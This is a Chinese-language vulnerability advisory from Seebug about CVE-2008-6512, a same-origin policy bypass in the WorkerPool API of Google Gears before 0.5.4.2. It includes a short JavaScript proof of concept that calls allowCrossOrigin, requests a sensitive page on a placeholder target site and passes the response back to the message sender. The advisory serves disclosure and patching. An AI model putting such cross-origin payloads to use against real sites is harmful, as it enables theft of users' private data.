Google Gears WorkerPool API绕过同源策略漏洞

2009-03-2500:00:00

Root

www.seebug.org

0.022 Low

EPSS

Percentile

89.5%

JSON

BUGTRAQ ID: 32698
CVE(CAN) ID: CVE-2008-6512

Google Gears是一个开源浏览器扩展，允许开发者开发离线网络程序。

Google Gears的WorkerPool API中存在跨域安全漏洞。如果攻击者在目标域上放置了包含有Google Gear命令的文件类型，然后从攻击域访问该文件，由于没有检查攻击域的响应头，因此可能绕过allowCrossOrigin函数的访问限制在目标域中运行worker代码。

Google Gears < 0.5.4.2
厂商补丁：

Google

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

<a href=“http://www.google.com” target=“_blank”>http://www.google.com</a>


                                                var wp = google.gears.workerPool;
wp.allowCrossOrigin();
wp.onmessage = function(a, b, message) {
  var request = google.gears.factory.create(\'beta.httprequest\');

  request.open(\'GET\', \'http://TARGET.SITE/SENSITIVE_PAGE.htm\');
   request.onreadystatechange = function() {
     if (request.readyState == 4) {
     wp.sendMessage(\&quot;The response was: \&quot; +
     request.responseText, message.sender);
     }
   };
request.send();
}

0.022 Low

EPSS

Percentile

89.5%

JSON

Related for SSV:4950